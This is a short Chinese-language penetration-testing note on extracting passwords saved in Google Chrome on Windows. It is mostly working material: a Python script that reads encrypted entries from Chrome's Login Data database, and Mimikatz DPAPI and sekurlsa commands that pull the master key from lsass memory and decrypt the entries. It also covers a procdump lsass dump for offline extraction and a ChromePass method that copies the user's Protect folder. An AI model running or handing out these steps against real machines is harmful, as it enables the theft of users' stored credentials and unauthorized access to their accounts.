谷歌瀏覽器保存密碼的讀取

通過Mimikatz讀取谷歌瀏覽器保存密碼：

1、查看是否存在密文，使用python讀取數據庫文件並提取出密文

dir /a %LocalAppData%\Google\Chrome\User Data\Default\Login Data

使用python腳本讀取Login Data並保存到文件中，代碼如下：

from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect("Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))
    f = open('test.txt', 'wb')
    f.write(result[2])
    f.close()

腳本執行后，提取Login Data中保存的密文，保存為test.txt

2、獲得該密文對應的Master Key File

dpapi::blob /in:test.txt

獲得對應guidMasterkey為{a111b0f6-b4d7-40c8-b536-672a8288b958}

即Master Key file的路徑為%APPDATA%\Microsoft\Protect\%SID%\a111b0f6-b4d7-40c8-b536-672a8288b958

3、從lsass進程提取出Master Key

privilege::debug
sekurlsa::dpapi

提取出Master Key為666638cbaea3b7cf1dc55688f939e50ea1002cded954a1d17d5fe0fbc90b7dd34677ac148af1f32caf828fdf7234bafbe14b39791b3d7e587176576d39c3fa70

如果這里不能直接用mimikatz在線讀的話，那么可以通過轉儲procdump.exe -accepteula -ma lsass.exe lsass.dmp，然后再本地進行提取Master Key

注意的：mimikatz從lsass進程提取出Master Key后，會自動將Master Key加入系統緩存

4、拿到Master Key，那么就可以直接對當前存儲在text.txt中的密文進行解密了

dpapi::blob /in test.txt

---

通過ChromePass讀取谷歌瀏覽器保存密碼：

前提條件：已知電腦賬號密碼

解密過程：我們需要得到的兩個文件：

1、Login Data數據庫文件：目錄位置%localappdata%\google\chrome\USERDA~1\default

2、%USERPROFILE%\AppData\Roaming\Microsoft把其中的Protect文件夾下載過來

參考文章：

1、https://3gstudent.github.io/3gstudent.github.io/滲透技巧-利用Masterkey離線導出Chrome瀏覽器中保存的密碼/

2、https://www.t00ls.net/viewthread.php?tid=52330&highlight=chrome